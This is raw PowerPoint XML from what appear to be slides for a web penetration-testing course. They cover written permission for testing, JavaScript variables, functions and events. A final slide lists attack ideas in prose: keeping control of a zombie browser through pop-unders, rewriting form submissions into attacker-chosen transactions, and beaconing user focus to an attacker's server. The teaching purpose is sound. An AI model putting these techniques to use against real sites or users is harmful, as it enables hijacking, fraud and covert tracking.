              <a:t>Getting permission from target system personnel is absolutely vital</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t want to end up with a lawsuit, or, worse yet, facing a prison sentence! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Get a permission memo signed by someone in authority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sample memo at </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>www.counterhack.net/permission_memo.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The permission must be in writing, and it must be signed!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t rely on mere verbal assent or a simple e-mail … you are asking for trouble</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2048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invGray">
          <a:xfrm>
            <a:off x="7071360" y="3474720"/>
            <a:ext cx="1806575" cy="1022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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="228600"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript Variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153603" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="1524000"/>
            <a:ext cx="8534400" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript variables are loosely typed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Any type of data can be assigned to a variable without concern about whether it is a string, integer, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Declaration is as simple as: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>var x;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Values can be assigned at declaration … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>var x="Sarah";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>… or later with: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>x="Sarah";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Note that if a variable is re-declared after a value is assigned to it, the original value is still assigned</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Variables declared outside of functions are accessible everywhere in the script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Variables declared in a function are only available in that function</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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154627" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="128587" y="1143483"/>
            <a:ext cx="8915400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>JavaScript functions can be declared anywhere in the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically safest to declare them in the &lt;HEAD&gt; to ensure they are loaded before being called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>var,var)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>code to execute</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To return data from a function, use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>statement within the function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To call a function use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>name();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>A function to alert the user then redirects the browser to the specified URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>function alertRedirect(url) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> 	alert("Redirecting...")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	window.location = url</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>}</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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="152400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155651" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="1295400"/>
            <a:ext cx="8839200" cy="1752600"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Every item in a page has a series of associated events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically the event calls a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This table lists some of the JavaScript events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="317479" name="Group 39"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="2743200"/>
          <a:ext cx="7924800" cy="3743326"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2190750">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5734050">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="33528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Tahoma" charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                        </a:rPr>
                        <a:t>Event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Tahoma" charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="412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Courier New" charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                          <a:cs typeface="Courier New" charset="0"/>
                        </a:rPr>
                        <a:t>onload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charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                        </a:rPr>
                        <a:t>Page or item (image, css or script) is finished loading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143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Courier New" charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                          <a:cs typeface="Courier New" charset="0"/>
                        </a:rPr>
                        <a:t>onunload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charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                        </a:rPr>
                        <a:t>User leaves the page the script is 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12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Courier New" charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                          <a:cs typeface="Courier New" charset="0"/>
                        </a:rPr>
                        <a:t>onerror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charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                        </a:rPr>
                        <a:t>An error occurs loading a page or item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143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Courier New" charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                          <a:cs typeface="Courier New" charset="0"/>
                        </a:rPr>
                        <a:t>onclick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charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                        </a:rPr>
                        <a:t>Item is clicked on with the mouse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12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Courier New" charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                          <a:cs typeface="Courier New" charset="0"/>
                        </a:rPr>
                        <a:t>onsubmit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charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                        </a:rPr>
                        <a:t>The form is submitted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3528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Courier New" charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                          <a:cs typeface="Courier New" charset="0"/>
                        </a:rPr>
                        <a:t>onfocus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charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                        </a:rPr>
                        <a:t>The item receives focus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3528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Courier New" charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                          <a:cs typeface="Courier New" charset="0"/>
                        </a:rPr>
                        <a:t>onblur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charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                        </a:rPr>
                        <a:t>The item loses focus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3528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Courier New" charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                          <a:cs typeface="Courier New" charset="0"/>
                        </a:rPr>
                        <a:t>onchange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charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                        </a:rPr>
                        <a:t>Content of the field changes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33528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Courier New" charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                          <a:cs typeface="Courier New" charset="0"/>
                        </a:rPr>
                        <a:t>onmouseover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charset="0"/>
                          <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                        </a:rPr>
                        <a:t>The mouse is hovering over the item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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Using Events in Attacks:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Ideas for Pen Testers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5124" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320040" y="1706880"/>
            <a:ext cx="5334000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>'s look at some example ideas for how to use the various events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>During the exploitation phase, we will use these events to perform various attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Change content of the page after it loads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>onunload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Launch pop-under window to retain control of a zombie browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>onsubmit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Change form values so the transaction is one of the attacker's choosing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>onfocus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Send http request to attacker's web server to reveal which controls the user is selecting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5125" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6316980" y="5760720"/>
            <a:ext cx="800100" cy="500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Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
